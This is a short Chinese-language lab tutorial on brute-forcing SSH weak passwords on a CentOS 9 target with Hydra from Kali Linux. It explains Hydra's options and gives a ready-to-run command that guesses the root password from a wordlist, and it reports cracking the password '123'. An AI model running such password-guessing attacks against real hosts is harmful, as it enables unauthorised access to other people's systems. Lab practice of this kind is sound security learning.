Hydra爆破shh弱口令_hydra 弱口令扫描

          hydra（九头蛇）一款开源的暴力破解密码工具，是目前功能最强大的破解工具之一。

kali默认安装了hydra，可以直接调用。

靶机：centos 9

查看ssh是否开启：systemctl status sshd.service

查看ssh22号端口是否打开：netstat -an | grep 22

攻击主机：kali linux 

常见参数：

· -l <LOGIN>：指定破解的用户，对特定用户破解

· -L <FILE>：指定用户名字典

· -p <PASS>：小写，指定密码破解，一般是使用密码字典

· -P <FILE>：大写，指定密码字典

· -o <FILE>：指定结果输出文件

· -f ：在使用-M参数以后，找到第一对登录名或者密码的时候中止破解

· -t <TASKS>：同时运行的线程数，默认为16

· -v / -V：显示详细过程

已知用户名为：root

kali自带的字典地址:/usr/share/wordlists/dirb/small.txt

hydra -l root -P /usr/share/wordlists/dirb/small.txt  -t 5 -v  -f 靶机IP ssh

密码123

由于密码简单，很快就爆破出来了。实战中可能需要很长时间。